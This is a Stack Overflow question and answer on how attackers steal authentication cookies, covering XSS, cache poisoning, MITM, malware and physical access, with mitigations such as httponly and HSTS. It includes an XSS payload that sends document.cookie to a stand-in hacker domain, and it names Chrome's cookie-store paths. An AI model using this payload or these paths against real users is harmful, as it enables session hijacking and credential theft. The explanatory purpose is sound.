# The way to get an authentication cookie from a user

Tags: forms-authentication

I’ve been reading about how the authentication cookies works and I have a question, how can an attacker get the authentication cookie of another user? 
Thank you!

Comment: Welcome to StackOverflow! I'm afraid your question is, in its current form, too broad. I advise you to research a bit more into this topic and try your own implementation/tests. StackOverflow is for programming-specific questions; [this](https://stackoverflow.com/help/how-to-ask) guide will explain things in more detail.

Answer (score 1):

There are many attacks that can be used to discover authentication cookies.

**XSS Attack**

For example, let's say that someone leaves the following as a comment on your website

```
<script>fetch('hackersdomain.com?cookies=' + document.cookie)</script>
```

Now anyone who loads your website's comments will be inadvertently sending their cookies to a domain the hacker controls.

This is why httponly should only be set to true when creating an authentication cookie. The httponly option will prevent JavaScript from having access to the cookies.

**Cache Poisoning**

By repeatedly loading a website, eventually you'll get the website to cache one of your requests. If your request contains a header with a XSS attack in it, and that header gets outputted to the page, you can successfully pull of an XSS attack, and get everyone's cookies.

**MITM**

If you can perform a man in the middle attack, you can get the cookies. This can happen if a person is using public WiFi, and they are able to intercept an initial HTTP request before the connection gets upgraded to HTTPS. Use HSTS to mitigate the ability for this to happen.

**Exploit a vulnerability to gain server access**

Uh oh, you have a serious problem.

**Malicous Executable / Phishing**

If you can get a user to download and run a program, you can steal all of their cookies. On Windows they are stored in an SQLite DB at `%LOCALAPPDATA%l\Google\Chrome\User Data\Default` and on Linux/Macs at `~/.config/google-chrome/Default/Cookies`.

**SQL Injection**

If a hacker finds a way to get something injected into the database, they can directly add our malicious XSS attack to the database.

**Physical Access**

It's pretty easy to get the authentication cookies from Chrome Dev Tools if you have physical access to someone's computer for a brief period of time.